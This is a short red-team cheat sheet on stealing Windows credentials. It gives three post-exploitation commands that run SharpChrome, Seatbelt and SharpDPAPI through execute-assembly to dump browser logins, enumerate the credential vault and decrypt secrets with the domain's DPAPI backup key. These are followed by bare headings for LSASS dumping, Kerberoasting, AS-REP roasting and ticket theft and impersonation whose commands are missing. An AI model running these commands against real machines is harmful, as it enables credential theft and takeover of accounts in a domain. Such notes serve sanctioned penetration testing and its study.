Credentials
Browser Credentials
execute-assembly C:\Tools\SharpDPAPI\SharpChrome\bin\Release\SharpChrome.exe loginsWindows Credential Manager
# Enumerate saved credentials
execute-assembly C:\Tools\Seatbelt\Seatbelt\bin\Release\Seatbelt.exe WindowsVault
# Decrypt via DC using DPAPI backup key
execute-assembly C:\Tools\SharpDPAPI\SharpDPAPI\bin\Release\SharpDPAPI.exe credentials /rpcOS Credential Dumping
Logon Passwords (AVOID)
Kerberos Encryption Keys (AVOID)
SAM Database (SAFE)
LSA Secrets (SAFE)
Cached Domain Credentials
AS-REP Roasting
Enumerate Vulnerable Users First
Roast Specific User
Crack Hash
Kerberoasting
Enumerate SPNs First
Roast Specific SPN
Crack Hash
Extracting Tickets from Memory
Triage Tickets
Dump Specific Ticket
Impersonate User with Ticket
Renewing TGTs
Check Ticket Validity
Renew Ticket
Last updated